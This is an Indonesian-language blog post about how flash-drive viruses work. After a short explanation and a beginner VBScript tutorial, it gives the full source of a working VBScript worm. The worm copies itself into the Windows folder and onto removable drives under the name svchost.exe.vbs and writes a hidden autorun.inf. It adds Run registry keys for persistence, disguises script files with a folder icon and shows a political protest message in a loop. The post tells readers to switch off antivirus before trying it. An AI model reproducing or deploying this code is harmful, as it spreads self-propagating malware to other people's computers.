.

« »

Pendahuluan

Untuk membuat sebuah virus tidaklah terlalu sulit hanya dengan menggunakan tool notepad saja kita sudah bisa membuat virus. Tetapi alangkah baiknya jika kita memahami sedikit bahasa pemrograman seperti Visual Basic. Sebelum kita bahas lebih jauh lagi penulis akan menjelaskan terlebih dahulu prinsip kerja virus pada umumnya.
Prinsip Kerja Virus

1. Virus pada dasarnya hanyalah sebuah program atau skrip pemrograman seperti halnya program-program yang sering kita temukan: Ms Word, Excel, Corel dan lain-lain. Hanya saja program ini dibuat untuk tujuan yang kurang baik bahkan merusak.
2. Ukuran program virus sangat kecil sehingga cukup untuk dimasukkan kedalam flashdisk atau disket dan biasanya icon yang digunakan sangat mirip dengan dokumen word atau berbentuk seperti folder.

Perhatikan gambar dibawah

Tiles

Sepintas tidak dapat di bedakan mana Folder asli mana bukan dan mana dokumen asli dan mana yang virus.

Sekarang perhatikan tampilan Folder dan Dokumen dalam View Details

Detailed

Icon Folder maupun dokumen dengan Type Application dan Screen Saver sudah dapat dipastikan adalah virus. Karena pembuat aplikasi dan screen saver memasang icon folder atau word pastilah punya itikad yang kurang baik.
3. Biasanya virus-virus ini menyamar dengan menggunakan nama file yang ada dalam flashdisk atau disket anda, sedangkan dokumen asli anda disembunyikan dalam hidden file. Untuk bagaimana cara memunculkan file hidden ini dapat anda lihat dalam blog Mencegah Virus tanpa anti virus
4. Saat anda klik dua kali virus ini maka program virus akan di eksekusi. Langkah pertama yang dilakukan virus adalah membuka dokumen yang disembunyikan untuk mengurangi kecurigaan pengguna.
5. Berikutnya virus akan mengcopy dirinya ke hard drive dan menuliskan registry di HKEY_LOCAL_MACHINE\Software\Microsoft \Windows\CurrentVersion\Run atau di HKEY_CURRENT_USER\Software\Microsoft \Windows\CurrentVersion\Run agar program virus secara otomatis di eksekusi saat komputer pertama kali menyala.
6. Jika perlu Virus mendisable Task manager dan regedit untuk mencegah pengguna menghapus virus secara manual
7. Berikutnya virus akan aktif untuk memeriksa jika ada file dokumen baru dalam flashdisk atau disket dalam setiap beberapa detik, yang kemudian akan disembunyikan kemudian mengcopy file virus dan memberi nama sesuai dengan nama file yang disembunyikan tadi. Virus juga akan menuliskan script Autorun.inf dalam flashdisk secara hidden agar virus secara otomatis dijalankan saat flashdisk di klik dua kali dalam My Computer

Jadi demikiankah siklus virus dari flashdisk ke komputer dan dari komputer ke flashdisk
Tentang VB Script

VB Script atau Visual Basic Script sebenarnya hanyalah teks biasa yang berisi kode pemrograman dengan bahasa visual basic dan disimpan dengan format vbs. Untuk membuat vbscript cukup menggunakan teks editor sederhana seperti Notepad atau menggunakan yang lebih lengkap seperti Ultra Edit atau Notepad++. Berikut adalah contoh membuat vbscript sederhana.

1. Buka program Notepad dari Start > All Programs > Accessories > Notepad.
2. Tulis teks berikut ini
Msgbox "Ini adalah contoh VB Script Sederhana"
3. Kemudian simpan file dengan Save as Type di ubah ke All files
4. Beri nama file tersebut dengan tambahan .vbs dibelakang. Contohnya ScriptSederhanan.vbs
5. Sekarang lihat tampilan ikon file di explorer, tidak lagi berupa teks. Coba klik 2 kali file tersebut, maka akan muncul kotak dialog bertuliskan Ini adalah contoh VB Script Sederhana.
6. Yang dibutuhkan bagi vbscript untuk menjadi virus hanyalah kode yang tepat sehingga mengikuti proses yang dijelaskan di atas.

Contoh Kode Virus Sederhana

Berikut adalah contoh kode virus menggunakan vbscript sederhana. Jika ingin mencoba sebaiknya Anti virus di matikan dan Install juga Deep Freeze kemudia bekukan seluruh harddrive

*****

'El Magnifico MAN
on error resume next
dim mysource,winpath,flashdrive,fs,mf,atr,tf,rg,nt,check,sd
atr = "[autorun]"&vbcrlf&"shellexecute=wscript.exe svchost.exe.vbs"
set fs = createobject("Scripting.FileSystemObject")
set mf = fs.getfile(Wscript.ScriptFullname)
dim text,size
size = mf.size
check = mf.drive.drivetype
set text=mf.openastextstream(1,-2)
do while not text.atendofstream
mysource=mysource&text.readline
mysource=mysource & vbcrlf
loop
do
Set winpath = fs.getspecialfolder(0)
set tf = fs.getfile(winpath & "\svchost.exe.vbs")
tf.attributes = 32
set tf=fs.createtextfile(winpath & "\svchost.exe.vbs",2,true)
tf.write mysource
tf.close
set tf = fs.getfile(winpath & "\svchost.exe.vbs")
tf.attributes = 39
for each flashdrive in fs.drives
If (flashdrive.drivetype = 1 or flashdrive.drivetype = 2) and flashdrive.path <> "A:" then
set tf=fs.getfile(flashdrive.path &"\svchost.exe.vbs")
tf.attributes =32
set tf=fs.createtextfile(flashdrive.path &"\svchost.exe.vbs",2,true)
tf.write mysource
tf.close
set tf=fs.getfile(flashdrive.path &"\svchost.exe.vbs")
tf.attributes =39
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes = 32
set tf=fs.createtextfile(flashdrive.path &"\autorun.inf",2,true)
tf.write atr
tf.close
set tf =fs.getfile(flashdrive.path &"\autorun.inf")
tf.attributes=39
end if
next
set rg = createobject("WScript.Shell")
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\svchost",winpath&"\svchost.exe.vbs"
rg.regwrite "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\MS32DLL",""
rg.regwrite "HKCR\vbsfile\DefaultIcon\","shell32.dll,3"
if check <> 1 then
Wscript.sleep 100000
end if
loop while check<>1
set sd = createobject("Wscript.shell")
sd.run winpath&"\explorer.exe /e,/select, "&Wscript.ScriptFullname

do while year(now) >= 2008
WScript.sleep 20000

msgbox "Hapuskan UN untuk meningkatkan pendidikan di Indonesia" & vbcrlf & _
"Karena di UN banyak terjadi kecurangan dan politik sekolah" & vbcrlf & _
"untuk menaikkan gengsi sekolah. Bahkan pada kabupaten tertentu," & vbcrlf & _
"kecurangan sudah direstui oleh pemerintah kabupaten tersebut" & vbcrlf & _
vbcrlf & vbcrlf & _
" HAPUSKAN UJIAN NASIONAL" & vbcrlf & vbcrlf & _
" Suara dari guru yang Risau pada sistem pendidikan"

loop

0 Comments:

Post a Comment



 
Powered By Blogger | Portal Design By egreat goth